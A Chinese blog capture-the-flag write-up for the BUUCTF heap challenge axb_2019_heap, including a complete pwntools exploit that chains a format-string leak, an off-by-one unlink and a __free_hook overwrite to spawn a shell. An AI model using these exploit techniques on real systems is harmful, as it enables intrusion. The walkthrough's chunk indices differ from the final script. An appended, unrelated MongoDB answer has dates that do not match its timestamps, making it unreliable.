axb_2019_heap【write up】

于 2023-04-08 17:51:38 发布
阅读量121 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_73756460/article/details/130032211
版权
文章描述了一个64位程序的安全漏洞利用过程,涉及格式化字符串漏洞来泄露main函数和__libc_start_main的地址,从而获取libc基址。通过堆操作,尤其是unlink和off-by-one漏洞,修改内存布局,最终实现执行system函数,获取shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

axb_2019_heap

unlink和格式化字符串漏洞

惯例我们先来checksec一下

保护全开的64位程序

请添加图片描述

放进ida64里

看一下main函数非常标准的菜单堆题

请添加图片描述

有趣的是在一开始的banner函数中存在格式化字符串漏洞

通过观察栈上数据我们可以利用该函数泄露出main函数地址(即绕过PIE保护)并泄露libc

请添加图片描述

add_note函数

请添加图片描述

更正图片中的错误size和chunk addr并不会重合

delete_note函数

非常标准的释放流程 不存在uaf漏洞

请添加图片描述

edit_note函数

内部有个自定义函数get_input

请添加图片描述

get_input函数(漏洞点)

请添加图片描述

审题完成 开始解题

首先我们通过格式化字符串漏洞来计算偏移 得到偏移为7

请添加图片描述

然后我们利用gdb调试可以发现main函数的地址在偏移为19的地方 __libc_start_main+243在偏移为15的地方

于是我们可以通过泄露这两个地址来获得libc的地址并绕过PIE保护

请添加图片描述

io.recvuntil('name: ')
payload=b"%15$p%19$p"
io.sendline(payload)
io.recvuntil('0x')
libc_base=int(io.recv(12),16)-libc.sym['__libc_start_main'] - 240
io.recvuntil('0x')
base=int(io.recv(12),16)-0x116A

然后我我们就可以通过计算得到note数组的地址和system函数的地址

接下来就是堆上的unlink操作了

由于我们观察edit函数发现存在off by one漏洞因此我们考虑使用unlink来达成我们的攻击目标

首先我们先来创建chunk

add(0,0x98,b'aaaa')
add(0,0x98,b'bbbb')
add(0,0x98,b'cccc')
add(0,0x98,b'/bin/sh')

然后我们通过edit函数来修改chunk0中的内容创建一个fd和bk指针指向note数组的fakechunk 并利用off by one漏洞 将chunk1中的size改为0xa0

将chunk1中的size修改为0xa0就会导致chunk1在free的时候认为前面已经是freechunk 进而触发堆合并unlink

payload=p64(0)+p64(0x91)+p64(bss-0x18)+p64(bss-0x10)+p64(0)*14+p64(0x90)+b'\xa0'
edit(0,payload)

然后我们将chunk1 free掉这样我们的chunk0实际上就已经跳转到了note数组上即此时我们note数组上原本存放chunk0地址的位置被篡改成了note的地址 这时我们编辑chunk0上的内容实际上就是在编辑note数组上的内容 我们将存放chunk0地址上的内容篡改为free_hook的地址

delete(1)
edit(0,p64(0)*3+p64(free_hook)+p64(0x10))

接下来我们修改chunk0上的内容实际上就是在修改free_hook上的内容 这样我们执行free函数实际上就是在执行system函数 接下来我们delete(3) 即可执行system(”/bin/sh“)

edit(0,p64(system))

然后只要io.interactive()就可以获取控制权啦
在这里插入图片描述

exp:

from pwn import *
#from LibcSearcher import *
context.log_level='debug'
#io=process('')
io=remote('node4.buuoj.cn',26148)
elf=ELF('./axb_2019_heap')
libc=ELF('./libc-2.23.so')
io.recvuntil('name: ')
payload=b"%15$p%19$p"
io.sendline(payload)
io.recvuntil('0x')
libc_base=int(io.recv(12),16)-libc.sym['__libc_start_main'] - 240
io.recvuntil('0x')
base=int(io.recv(12),16)-0x116A
system=libc.sym['system']+libc_base

free_hook=libc_base+libc.sym['__free_hook']

bss=base+0x202060
print(hex(base))
print(hex(libc_base))

#fmstr attack finish

def add(idx,size,content):
	io.sendlineafter(">> ",b"1")
	io.sendlineafter("(0-10):",str(idx))
	io.sendlineafter("size:",str(size))
	io.sendlineafter("content:",content)
	
def delete(idx):
	io.sendlineafter(">> ",b"2")
	io.sendlineafter("index:",str(idx))
	
def edit(idx,content):
	io.sendlineafter(">> ",b"4")
	io.sendlineafter("index:",str(idx))
	io.sendlineafter("content: \n",content)
	
add(0,0x98,b'aaaa')
add(1,0x98,b'bbbb')
add(2,0x90,b'cccc')
add(3,0x90,b'/bin/sh')

payload=p64(0)+p64(0x91)+p64(bss-0x18)+p64(bss-0x10)+p64(0)*14+p64(0x90)+b'\xa0'
edit(0,payload)
delete(1)
edit(0,p64(0)*3+p64(free_hook)+p64(0x10))
edit(0,p64(system))
delete(3)
io.interactive()
[BUUCTF]-PWN:axb_2019_heap解析(格式化字符串漏洞,unlink,off by one)
2301_79326813的博客
02-20 590
查看保护查看ida大致就是alloc创建堆块,free释放堆块,以及fill填充堆块。
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 720
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
axb_2019_heap
qq_51627915的博客
02-07 300
axb_2019_heap
buuctf axb_2019_heap
weixin_45677731的博客
09-23 1701
拖进IDA之后,发现输入函数是存在off-by-one漏洞的,可以进行溢出 同时存在全局指针数组,就可以利用这个溢出来构造fake chunk,然后实现unlink 除此之外,这个程序malloc的大小是不能小于0x80的,额。。。其实这个不重要,问题不大,注意下就好了 但是,程序的保护全都开启了 也就是说,程序的地址是随机的,我们并不知道chunk指针的存放地址 如何泄露呢?这时还发现程序开头存在格式化字符串的漏洞 打开调试,输入8个a,在printf(&format)这里停一下,然后看下栈
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 911
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1322
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
axb_2019_heap详解
像初雪一样自由洒落
04-25 716
关于axb_2019_heap的详解 参考:buuctf axb_2019_heap 程序流程 banner:存在格式化字符串漏洞,可以泄漏栈上的信息 add:根据idx创建size(大于0x80)大小的内容为content的块 块指针和块大小存放在一个全局变量note中 delete:释放的很干净,没有uaf edit:存在off by one get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 *.
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 253
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
AXB
weixin_30580341的博客
01-21 701
大数相乘 sum中,高位在前,所以两个乘数必须先转换一下,即末位在前,依此类推。 View Code 1 #include<stdio.h> 2 #include<string.h> 3 const int maxn = 505; 4 char a[ maxn ],b[ maxn ]; 5 int sum[ maxn*2 ]; 6...
shanghai2019_boringheap
doudoudedi
02-18 402
思路 abs函数(取绝对值)的溢出使得为负数然后改size构造2个指针指向同一chunk完成一次double free为远程ubuntu18即可以直接打free_hook exp: from pwn import * #p=process('./pwn') p=remote('node3.buuoj.cn',26942) elf=ELF('./pwn') libc=elf.libc def ad...
axb_2019_fmt32
、moddemod
07-19 869
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
cmcc_simplerop
doudoudedi
02-20 1104
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p +...
BUUCTF pwn wp 96 - 100
fa1c4的blog
02-23 831
axb_2019_heap axb_2019_heap(master*)$ file axb_2019_heap;checksec axb_2019_heap axb_2019_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bdd2a0e3
pwn unlink
doudoudedi
12-11 450
unlink需要gobal变量然后可以写入多次,全局变量在heap上面 unlink的宏 p->fd=FD p->bk=BK if p->fd->bk!=p || p-bk-fd!=p worry else FD->bk=BK &p-0x18 BK->fd=FD &p-0x10 如上可以绕过检查result:&p=&p...
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1648
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
PWN-PRACTICE-BUUCTF-23
P1umH0的博客
09-09 680
PWN-PRACTICE-BUUCTF-23gyctf_2020_some_thing_excetingaxb_2019_heap[极客大挑战 2019]Not Badinndy_echo gyctf_2020_some_thing_exceting 程序读取了flag到bss段上的0x6020A8地址处 存在uaf漏洞,利用fastbins的LIFO原则,create大小合适的chunk并free 再次create,将0x6020A8覆写到之前create并free掉的chunk里,最后show即可打印出
BUUCTF刷题5
m0_51251108的博客
10-30 671
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
{"count": "AXB_MTWM_CALL_FINISH_RECORD_INFO", "query": {"result": "0", "baselineTime": {"$gte": 1740758400000, "$lt": 1740844800000}}}, 变成mongo查询语句
最新发布
03-13
### 将JSON结构转换为MongoDB查询语句 要将给定的JSON结构转换为MongoDB查询语句,可以按照以下方式构建查询: #### 查询语句 假设集合名称为 `AXB_MTWM_CALL_FINISH_RECORD_INFO`,查询条件如下所示: ```javascript { "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } } ``` 完整的MongoDB查询语句可以通过 `db.collection.find()` 方法实现: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.find({ "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } }); ``` 此查询表示筛选出集合 `AXB_MTWM_CALL_FINISH_RECORD_INFO` 中满足以下两个条件的文档: 1. 字段 `result` 的值等于 `"0"`[^1]。 2. 字段 `baselineTime` 的值大于或等于 `ISODate("2025-01-28T00:00:00Z")` 并小于 `ISODate("2025-01-29T00:00:00Z")`[^2]。 如果需要进一步优化性能,可以在 `result` 和 `baselineTime` 上创建复合索引来加速查询操作。例如: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.createIndex({ result: 1, baselineTime: 1 }); ``` 这一步骤有助于提高查询效率,尤其是在处理大规模数据集时[^3]。 #### Java 实现示例 以下是基于 Java 驱动程序执行上述查询的一个示例代码片段: ```java import com.mongodb.client.MongoClients; import com.mongodb.client.MongoCollection; import com.mongodb.client.MongoDatabase; import org.bson.Document; public class MongoDBQueryExample { public static void main(String[] args) { try (var mongoClient = MongoClients.create("mongodb://localhost:27017")) { var database = mongoClient.getDatabase("your_database_name"); var collection = database.getCollection("AXB_MTWM_CALL_FINISH_RECORD_INFO"); Document query = new Document("result", "0") .append("baselineTime", new Document("$gte", java.time.Instant.parse("2025-01-28T00:00:00Z")) .append("$lt", java.time.Instant.parse("2025-01-29T00:00:00Z"))); collection.find(query).forEach(doc -> System.out.println(doc.toJson())); } } } ``` 这段代码展示了如何通过 Java API 构建并运行指定的查询逻辑[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值